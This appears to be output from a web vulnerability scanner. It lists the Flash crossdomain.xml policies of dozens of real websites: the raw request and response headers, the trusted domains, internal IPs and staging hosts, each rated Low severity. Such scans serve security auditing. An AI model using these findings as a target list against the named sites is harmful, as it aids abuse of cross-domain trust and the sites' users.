HTTP/1.1 200 OK Content-Length: 370 Content-Type: text/xml Last-Modified: Fri, 27 Jun 2008 14:53:19 GMT Accept-Ranges: bytes ETag: "fde0f98965d8c81:0" Server: Microsoft-IIS/7.0 Set-Cookie: stop_mobi=; path=/ X-Powered-By: ASP.NET X-UA-Compatible: IE=7 P3P: CP=" BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI " X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 13:26:07 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <!-- Policy file for http://www.dell.com --> <cross-domain-policy> <allow-access-from domain="*.dell.com" /> <allow-access-from domain="*.coltas.com" /> <allow-access-from domain="*.dellpartnerdirect.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.demdex.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.demdex.net |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:53:36 GMT Server: Apache/2.2.10 (Unix) Last-Modified: Thu, 09 Dec 2010 16:36:41 GMT ETag: "6869d-d0-496fcd7a9d840" Accept-Ranges: bytes Content-Length: 208 P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT" Keep-Alive: timeout=5, max=99 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.adap.tv"/> </cross-domain- ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.dicksspor |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.dickssportinggoods |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:34:01 GMT Server: Apache/2.0.63 (Unix) Last-Modified: Thu, 08 May 2008 01:32:26 GMT ETag: "4bc054-309-44cae0dc6de80 Accept-Ranges: bytes Content-Length: 777 Cache-Control: max-age=172800 Expires: Mon, 04 Apr 2011 13:34:01 GMT Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: application/xml <cross-domain-policy> <allow-access-from domain="www.dicksspo <allow-access-from domain="dsp.imageg.net"/> <allow-access-from domain="dsp.merch2.gspt.net"/> <allow-access-from domain="dsp.merch.gspt.net"/> <allow-access-from domain="preview.gsipartners.com"/> <allow-access-from domain="preview1.gsipartners.com"/> <allow-access-from domain="preview.remotetools <allow-access-from domain="preview1.remotetools <allow-access-from domain="*.gspt.net"/> <allow-access-from domain="*.gsipartners.com"/> <allow-access-from domain="172.20.1.236" /> <allow-access-from domain="172.21.1.236" /> <allow-access-from domain="206.16.220.236" /> <allow-access-from domain="63.240.110.236" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.directv.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.directv.com |
HTTP/1.1 200 OK Cache-Control: max-age=900 Content-Length: 138 Content-Type: text/xml Last-Modified: Wed, 08 Dec 2010 23:00:17 GMT Accept-Ranges: bytes ETag: "801612ae2b97cb1:80b" Server: Microsoft-IIS/6.0 Set-Cookie: TLTHID=FFF623684C9DC Set-Cookie: TLTSID=FFF623684C9DC Date: Sat, 02 Apr 2011 13:26:10 GMT Connection: close <cross-domain-policy> <allow-access-from domain="*.directv.com"/> <allow-access-from domain="*.brightcove.com"/> </cross-domain-policy> |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.discovery.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.discovery.com |
HTTP/1.0 200 OK Server: Apache/2.2.15 (Unix) Last-Modified: Mon, 13 Dec 2010 19:02:38 GMT ETag: "238b88-1763-4974f58 Accept-Ranges: bytes Content-Length: 5987 Content-Type: application/xml Date: Sat, 02 Apr 2011 13:25:18 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <!-- GLOBAL DISCOVERY --> <allow-access-from domain="*.discovery.com" /> ...[SNIP]... <allow-access-from domain="*.stage.discovery.com" /> ...[SNIP]... <allow-access-from domain="*.stg.discovery.com" /> ...[SNIP]... <allow-access-from domain="*.uat.discovery.com" /> ...[SNIP]... <allow-access-from domain="*.test.discovery.com" /> ...[SNIP]... <allow-access-from domain="*.dpr.discovery.com" /> ...[SNIP]... <allow-access-from domain="*.dev.discovery.com" /> ...[SNIP]... <allow-access-from domain="*.oascentral.discovery ...[SNIP]... <allow-access-from domain="dctladreg01.itg.discovery ...[SNIP]... <allow-access-from domain="*.discoverymedia.com" /> ...[SNIP]... <allow-access-from domain="*.pointroll.com" /> ...[SNIP]... <allow-access-from domain="*.247realmedia.com" /> ...[SNIP]... <allow-access-from domain="*.doubleclick.*" /> ...[SNIP]... <allow-access-from domain="*.akamai.net" /> ...[SNIP]... <allow-access-from domain="*.pets911.com" /> <allow-access-from domain="pets911.buffalo.com" /> ...[SNIP]... <allow-access-from domain="discovery.blogs.com" /> ...[SNIP]... <allow-access-from domain="*.brightcove.vo.llnwd.net" /> ...[SNIP]... <allow-access-from domain="*.vo.llnwd.net" /> ...[SNIP]... <allow-access-from domain="*.brightcove.*" /> ...[SNIP]... <allow-access-from domain="*.channelfinder.net" /> ...[SNIP]... <allow-access-from domain="*.foodfit.com" /> <allow-access-from domain="*.healthgrades.com" /> <allow-access-from domain="*.centerwatch.com" /> <allow-access-from domain="*.sittercity.com" /> <allow-access-from domain="*.chumby.com" /> ...[SNIP]... <allow-access-from domain="*.howstuffworks.com" /> ...[SNIP]... <allow-access-from domain="*.petfinder.com" /> ...[SNIP]... <allow-access-from domain="*.treehugger.com" /> ...[SNIP]... <allow-access-from domain="*.crewintegrated.com" /> ...[SNIP]... <allow-access-from domain="video.search.yahoo.com" /> ...[SNIP]... <allow-access-from domain="*.tv.com" /> ...[SNIP]... <allow-access-from domain="test.bayrock.net" /> ...[SNIP]... <allow-access-from domain="test.philadelphiaspeed ...[SNIP]... <allow-access-from domain="*.facebook.com" /> ...[SNIP]... <allow-access-from domain="*.sympleton.com" /> ...[SNIP]... <allow-access-from domain="*.att.com" /> ...[SNIP]... <allow-access-from domain="*.clearspring.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.diynetwork.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.diynetwork.com |
HTTP/1.0 200 OK Server: Apache/2.0.63 (Unix) Last-Modified: Mon, 09 Nov 2009 19:15:05 GMT Accept-Ranges: bytes Content-Length: 967 Content-Type: application/xml Date: Sat, 02 Apr 2011 14:03:31 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.hgtvpro.com"/> <allow-access-from domain="*.hgtv.com"/> <allow-access-from domain="*.diynetwork.com"/> <allow-access-from domain="*.diynet.com"/> <allow-access-from domain="*.fineliving.com"/> <allow-access-from domain="*.food.com"/> <allow-access-from domain="*.foodnetwork.com"/> <allow-access-from domain="*.gactv.com"/> <allow-access-from domain="*.scrippsonline.com"/> <allow-access-from domain="*.hottrends2005.com"/> <allow-access-from domain="*.hottrends2006.com"/> <allow-access-from domain="*.scrippsnetworks.com"/> <allow-access-from domain="72.3.226.28" /> <allow-access-from domain="*.widgets.isg-marketing <allow-access-from domain="*.videomment.com" /> <allow-access-from domain="*.videomerce.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.dslreports.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.dslreports.com |
HTTP/1.1 200 OK Server: nginx Date: Sat, 02 Apr 2011 14:03:16 GMT Content-Type: text/xml Content-Length: 393 Last-Modified: Wed, 07 May 2008 23:58:53 GMT Connection: close Accept-Ranges: bytes <cross-domain-policy> <allow-access-from domain="www.targetscope.com" /> <allow-access-from domain="www.broadbandreports.com" /> <allow-access-from domain="www.dslreports <allow-access-from domain="dev.dslreports.com" /> <allow-access-from domain="www.aggiejy.com" /> <allow-access-from domain="216.254.95.41" /> <allow-access-from domain="*.catt.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.dt00.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.dt00.net |
HTTP/1.1 200 OK Server: nginx/0.8.54 Date: Sat, 02 Apr 2011 14:00:05 GMT Content-Type: text/xml Content-Length: 526 Last-Modified: Tue, 21 Jul 2009 13:01:21 GMT Connection: close Expires: Mon, 02 May 2011 14:00:05 GMT Cache-Control: max-age=2592000 Accept-Ranges: bytes <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="intv.ru" to-ports="80"/> <allow-http-request <allow-access-from domain="*.intv.ru" to-ports="80"/> ...[SNIP]... <allow-access-from domain="www.liveresult.ru" to-ports="80"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.ebay.ca |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.ebay.ca |
HTTP/1.0 200 OK Server: Apache-Coyote/1.1 Last-Modified: Wed, 27 Oct 2010 13:21:58 GMT Content-Type: application/xml Expires: Sat, 02 Apr 2011 14:10:04 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 02 Apr 2011 14:10:04 GMT Content-Length: 3890 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.ebay.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.ebay.au" secure="false"/> ...[SNIP]... <allow-access-from domain="*.ebay.at" secure="false"/> ...[SNIP]... <allow-access-from domain="*.ebay.be" secure="false"/> ...[SNIP]... <allow-access-from domain="*.ebay.ca" secure="false"/> ...[SNIP]... <allow-access-from domain="*.ebay.com.cn" secure="false"/> ...[SNIP]... <allow-access-from domain="*.ebay.fr" secure="false"/> ...[SNIP]... <allow-access-from domain="*.ebay.de" secure="false"/> ...[SNIP]... <allow-access-from domain="*.ebay.com.hk" secure="false"/> ...[SNIP]... <allow-access-from domain="*.ebay.in" secure="false"/> ...[SNIP]... <allow-access-from domain="*.ebay.ie" secure="false"/> ...[SNIP]... <allow-access-from domain="*.ebay.it" secure="false"/> ...[SNIP]... <allow-access-from domain="*.ebay.com.my" secure="false"/> ...[SNIP]... <allow-access-from domain="*.ebay.nl" secure="false"/> ...[SNIP]... <allow-access-from domain="*.ebay.nz" secure="false"/> ...[SNIP]... <allow-access-from domain="*.ebay.ph" secure="false"/> ...[SNIP]... <allow-access-from domain="*.ebay.pl" secure="false"/> ...[SNIP]... <allow-access-from domain="*.ebay.sg" secure="false"/> ...[SNIP]... <allow-access-from domain="*.ebay.es" secure="false"/> ...[SNIP]... <allow-access-from domain="*.ebay.ch" secure="false"/> ...[SNIP]... <allow-access-from domain="*.ebay.co.uk" secure="false"/> ...[SNIP]... <allow-access-from domain="*.ebayrtm.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.ebaystatic.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.verve8media.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.westernfreight.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.ebay.ru" secure="false"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.economist.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.economist.com |
HTTP/1.1 200 OK Server: Apache/2.2.3 (Red Hat) Last-Modified: Fri, 25 Mar 2011 15:58:35 GMT ETag: "78092-267-49f50aa9600c0" Cache-Control: max-age=1209600 Expires: Tue, 12 Apr 2011 08:20:55 GMT X-ws: 9 Content-Type: text/xml Content-Length: 615 Date: Sat, 02 Apr 2011 13:54:47 GMT X-Varnish: 1459381536 1449341695 Age: 365632 Via: 1.1 varnish Connection: close X-Varnish-Cache: HIT <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*.economist.com"/> <allow-access-from domain="*.*.economist.com"/> <allow-access-from domain="*.zedo.com"/> <allow-access-from domain="*.tangozebra.com"/> <allow-access-from domain="*.*.doubleclick.net"/> <allow-access-from domain="*.doubleclick.net"/> <allow-access-from domain="*.doubleclick.com"/> <allow-access-from domain="*.*.2mdn.net"/> <allow-access-from domain="*.2mdn.net"/> <allow-access-from domain="sandbox.dartmotif.com"/> <allow-access-from domain="*.serving-sys.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.edmunds.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.edmunds.com |
HTTP/1.0 200 OK Content-Type: text/xml; charset=ISO-8859-1 Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 P3P: policyref="http://www Expires: Sat, 02 Apr 2011 13:24:29 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 02 Apr 2011 13:24:29 GMT Content-Length: 2311 Connection: close <?xml version="1.0" encoding="utf-8"?> <!-- http://www.edmunds.com <cross-domain-policy> <allow-access-from domain="www.insideline.com"/> <allow-access-from domain="*.insideline.com"/> <allow-access-from domain="*.edmunds-media.com"/> <allow-access-from domain="*.il.edmunds-media.com"/> <allow-access-from domain="*.ed.edmunds-media.com"/> ...[SNIP]... <allow-access-from domain="*.edmunds.com"/> <allow-access-from domain="204.16.217.*"/> ...[SNIP]... <allow-access-from domain="204.2.160.*"/> ...[SNIP]... <allow-access-from domain="motifcdn.doubleclick.net"/> ...[SNIP]... <allow-access-from domain="m.doubleclick.net"/> ...[SNIP]... <allow-access-from domain="m2.doubleclick.net"/> ...[SNIP]... <allow-access-from domain="m3.doubleclick.net"/> ...[SNIP]... <allow-access-from domain="m.2mdn.net"/> ...[SNIP]... <allow-access-from domain="m2.2mdn.net"/> ...[SNIP]... <allow-access-from domain="betadfa.doubleclick.net"/> ...[SNIP]... <allow-access-from domain="dfa.doubleclick.net"/> ...[SNIP]... <allow-access-from domain="motifcdn2.doubleclick.net"/> ...[SNIP]... <allow-access-from domain="ad.doubleclick.net"/> ...[SNIP]... <allow-access-from domain="m1.2mdn.net"/> ...[SNIP]... <allow-access-from domain="*.doubleclick.net"/> ...[SNIP]... <allow-access-from domain="*.2mdn.net"/> ...[SNIP]... <allow-access-from domain="cdn.edmunds.com*"/> <allow-access-from domain="216.133.230.222"/> <allow-access-from domain="216.133.230.225"/> <allow-access-from domain="216.133.230.226"/> <allow-access-from domain="216.133.230.227"/> <allow-access-from domain="216.133.230.228"/> <allow-access-from domain="216.133.230.229"/> <allow-access-from domain="216.133.230.230"/> <allow-access-from domain="216.133.230.231"/> ...[SNIP]... <allow-access-from domain="*.brightcove.com"/> ...[SNIP]... <allow-access-from domain="*.local"/> <allow-access-from domain="*.localhost"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.eharmony.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.eharmony.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:38:39 GMT Server: Apache/2.2.16 (Unix) Last-Modified: Wed, 04 Aug 2010 23:07:16 GMT ETag: "42f-48d077ea6f100" Accept-Ranges: bytes Content-Length: 1071 Cache-Control: max-age=900 Expires: Sat, 02 Apr 2011 13:53:39 GMT Vary: Accept-Encoding Connection: close Content-Type: text/xml Set-Cookie: BIGipServerFront Set-Cookie: lbid=9d2a2466-11db-45be <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain <allow ...[SNIP]... <allow-access-from domain="static.eharmony.com" /> <allow-access-from domain="*.eharmony.com" /> <allow-access-from domain="*.eharmony.ca" /> <allow-access-from domain="*.eharmony.com.au" /> <allow-access-from domain="*.eharmony.co.uk" /> <allow-access-from domain="*.eharmony.com.br" /> <allow-access-from domain="*.compatiblepartners.net" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.elle.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.elle.com |
HTTP/1.0 200 OK Server: Apache/2.2.14 (Unix) DAV/2 PHP/5.2.12 SVN/1.5.5 Last-Modified: Tue, 15 Mar 2011 04:36:57 GMT ETag: "76ac0-db-49e7dfa764c40" Accept-Ranges: bytes Content-Length: 219 Content-Type: application/xml Date: Sat, 02 Apr 2011 14:06:45 GMT Connection: close <?xml version="1.0" encoding="utf-8"?> <cross-domain-policy> <allow-access-from domain="*.hfmus.com" /> <allow-access-from domain="hfm.checkm8.com" /> <allow-access-from domain="*.elle.com" /> </cro ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.emedtv.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.emedtv.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:39:55 GMT Server: Apache/2.2.3 (Red Hat) Set-Cookie: UT1=173.193.214.243 ETag: W/"213-1277746037000" Last-Modified: Mon, 28 Jun 2010 17:27:17 GMT Content-Length: 213 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.emedtv.com" /> </cross-d ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.engadget.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.engadget.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 14:13:33 GMT Server: Apache/2.2 Accept-Ranges: bytes Content-Length: 318 Keep-Alive: timeout=5, max=1000000 Connection: Keep-Alive Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.aol.com" /> <allow-access-from domain="*.blogsmithmedia.com" /> <allow-access-from domain="*.unicast.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.entertonement |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.entertonement.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 14:09:54 GMT Server: Apache/2.2.14 (Ubuntu) Last-Modified: Tue, 07 Dec 2010 22:38:10 GMT Accept-Ranges: bytes Content-Length: 367 Vary: Accept-Encoding Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.entertonement.com"/> <allow-access-from domain="*.etmnt.com"/> <allow-access-from domain="*.chir.ps"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.eonline.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.eonline.com |
HTTP/1.0 200 OK Server: Apache/2.2.2 (Unix) mod_jk/1.2.20 PHP/5.2.4 Accept-Ranges: bytes Content-Length: 1462 Content-Type: application/xml Date: Sat, 02 Apr 2011 13:43:46 GMT Connection: close Set-Cookie: edition=us; expires=Sun, 03-Apr-2011 13:43:46 GMT; path=/; domain=.eonline.com Set-Cookie: adEdition=us; expires=Sun, 03-Apr-2011 13:43:46 GMT; path=/; domain=.eonline.com <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.2mdn.net" /> <allow-access-from domain="*.72andsunny.com" /> <allow-access-from domain="*.aolcdn.com" /> <allow-access-from domain="*.att.net" /> <allow-access-from domain="*.brightcove.com" /> <allow-access-from domain="*.casylum.com"/> <allow-access-from domain="*.clearchannel.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.clearspring.com" /> <allow-access-from domain="*.creativeasylumdev.com" /> <allow-access-from domain="*.doubleclick.net" /> <allow-access-from domain="*.dvlabs.com" /> <allow-access-from domain="*.eentertainment.com"/> <allow-access-from domain="*.eonline.com" /> <allow-access-from domain="*.googlesyndication.com" /> <allow-access-from domain="*.klipmart.com" /> <allow-access-from domain="*.klipmart.com.edgesuite <allow-access-from domain="*.kliptracker.com" /> <allow-access-from domain="*.kmshowcase.com" /> <allow-access-from domain="*.movenetworks.com" /> <allow-access-from domain="*.mystyle.com" /> <allow-access-from domain="*.oosocial.net" /> <allow-access-from domain="*.stylenetwork.com" /> <allow-access-from domain="*.wordpress.comcastnets <allow-access-from domain="*.xlontech.net"/> <allow-access-from domain="*.zugara.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.epa.gov |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.epa.gov |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 14:12:52 GMT Server: Apache Last-Modified: Tue, 13 Jul 2010 15:52:00 GMT ETag: "51b9349-115-48b46d9 Accept-Ranges: bytes Content-Length: 277 Connection: close Content-Type: text/xml <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.rtpnc.epa.gov"/> <allow-access-from domain="*.epa.gov"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.etsy.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.etsy.com |
HTTP/1.0 200 OK Server: Apache Last-Modified: Wed, 27 Oct 2010 18:34:53 GMT Accept-Ranges: bytes Content-Length: 352 Content-Type: text/xml Date: Sat, 02 Apr 2011 13:31:05 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="etsy.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.etsy.com" secure="false"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.evite.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.evite.com |
HTTP/1.0 200 OK Server: Apache Last-Modified: Thu, 10 Sep 2009 01:53:50 GMT ETag: "4e1c62-102-4732f789129a8 Content-Type: application/xml Vary: User-Agent Expires: Sat, 02 Apr 2011 12:43:20 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 02 Apr 2011 12:43:20 GMT Content-Length: 258 Connection: close Set-Cookie: evsessionid=66.235.125.15 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.evite.com"/> <allow-access-from domain="*.yimg.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.expedia.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.expedia.com |
HTTP/1.0 200 OK Content-Length: 1950 Content-Type: text/xml Last-Modified: Tue, 27 Apr 2010 20:20:24 GMT Accept-Ranges: bytes ETag: "0b4401147e6ca1:0" Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI" Date: Sat, 02 Apr 2011 13:23:12 GMT Connection: close ...<?xml version="1.0" ?> <!DOCTYPE cross-domain-policy> <cross-domain-policy> <allow-access-from domain="*.expedia.ca" secure="true" /> <allow-access-from domain="*.expedia.co.uk" secure="true" /> ...[SNIP]... <allow-access-from domain="*.expedia.com" secure="true" /> ...[SNIP]... <allow-access-from domain="content.expedia.com" secure="true" /> ...[SNIP]... <allow-access-from domain="ads.expedia.com" secure="true" /> ...[SNIP]... <allow-access-from domain="media.expedia.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.expedia.com.au" secure="true" /> ...[SNIP]... <allow-access-from domain="*.expedia.com.jp" secure="true" /> ...[SNIP]... <allow-access-from domain="*.expedia.de" secure="true" /> ...[SNIP]... <allow-access-from domain="*.expedia.fr" secure="true" /> ...[SNIP]... <allow-access-from domain="*.expedia.it" secure="true" /> ...[SNIP]... <allow-access-from domain="*.expedia.nl" secure="true" /> ...[SNIP]... <allow-access-from domain=" www.expediacorporate.com" secure="true"/> ...[SNIP]... <allow-access-from domain="expediacorporate.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*expediacorporate.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.hotels.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.hotwire.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.tripadvisor.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.wwte.ca" secure="true" /> ...[SNIP]... <allow-access-from domain="*.wwte1.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.wwte4.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.wwte5.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.wwte7.com" secure="true" /> ...[SNIP]... <allow-access-from domain="labadssrv01" secure="true" /> ...[SNIP]... <allow-access-from domain="labadsol01" secure="true" /> ...[SNIP]... <allow-access-from domain="10.95.1.5" secure="true" /> ...[SNIP]... <allow-access-from domain="belwaweb01" secure="true" /> ...[SNIP]... <allow-access-from domain="*.unicast.com" secure="true" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.factmonster |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.factmonster.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 14:16:25 GMT Server: Apache Set-Cookie: Apache=173.193.214.243 Last-Modified: Thu, 28 Oct 2010 21:07:40 GMT ETag: "1cd-493b3bb70bf00" Accept-Ranges: bytes Content-Length: 461 Cache-Control: max-age=0 Expires: Sat, 02 Apr 2011 14:16:25 GMT Vary: Accept-Encoding Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.infoplease.com" /> <allow-access-from domain="infoplease.info" /> <allow-access-from domain="*.infoplease.info" /> <allow-access-from domain="i.infopls.com" /> <allow-access-from domain="*.familyeducation.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.familyedu |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.familyeducation.com |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sat, 02 Apr 2011 13:56:22 GMT Content-Type: text/xml Accept-Ranges: bytes Last-Modified: Mon, 23 Aug 2004 15:52:19 GMT ETag: "f06edb2b2989c41:941" Content-Length: 562 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="fen.com" /> <allow-access-from domain="*.fen.com" /> <allow-access-from domain="familyeducation.com" /> <allow-access-from domain="*.familyeducation.com" /> <allow-access-from domain="fekids.com" /> <allow-access-from domain="*.fekids.com" /> <allow-access-from domain="funbrain.com" /> <allow-access-from domain="*.funbrain.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.famousfootwear |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.famousfootwear.com |
HTTP/1.0 200 OK Content-Length: 389 Content-Type: text/xml Last-Modified: Fri, 12 Jun 2009 13:50:37 GMT Accept-Ranges: bytes ETag: "b9b92bc464ebc91:809f" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 14:16:34 GMT Connection: close <?xml version="1.0" encoding="UTF-8"?> <cross-domain-policy xmlns:xsi="http://www.w3 <allow-access-from domain="*.interfacecms.com" /> <allow-access-from domain="*.famousfootwear.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.fandango.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.fandango.com |
HTTP/1.0 200 OK Cache-Control: no-cache Content-Length: 1464 Content-Type: text/xml Last-Modified: Tue, 28 Sep 2010 15:46:00 GMT Accept-Ranges: bytes ETag: "02c8f3f245fcb1:1e98" Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa OUR DELa STP BUS UNI COM NAV INT CNT STA" X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 13:26:51 GMT Connection: close <?xml version="1.0"?> <cross-domain-policy xmlns:xsi="http://www.w3 <site-control per ...[SNIP]... <allow-access-from domain="comcast.net" secure="false"/> ...[SNIP]... <allow-access-from domain="*.comcast.net" secure="false"/> ...[SNIP]... <allow-access-from domain="*.comcastonline.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.att.net" secure="false"/> ...[SNIP]... <allow-access-from domain="media.pointroll.com"/> <allow-access-from domain="www.pointroll.com"/> <allow-access-from domain="submit.pointroll.com"/> <allow-access-from domain="data.pointroll.com"/> <allow-access-from domain="speed.pointroll.com"/> <allow-access-from domain="mirror.pointroll.com"/> <allow-access-from domain="mx.pointroll.com"/> <allow-access-from domain="geo.pointroll.com"/> <allow-access-from domain="ll.pointroll.com"/> <allow-access-from domain="demo.pointroll.net"/> <allow-access-from domain="clk.pointroll.com"/> <allow-access-from domain="clients.pointroll.com"/> <allow-access-from domain="images.fandango.com" secure="false"/> ...[SNIP]... <allow-access-from domain="a248.e.akamai.net" secure="true"/> ...[SNIP]... <allow-access-from domain="cdn1.eyewonder.com"/> <allow-access-from domain="cdn.eyewonder.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.fanfiction.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.fanfiction.net |
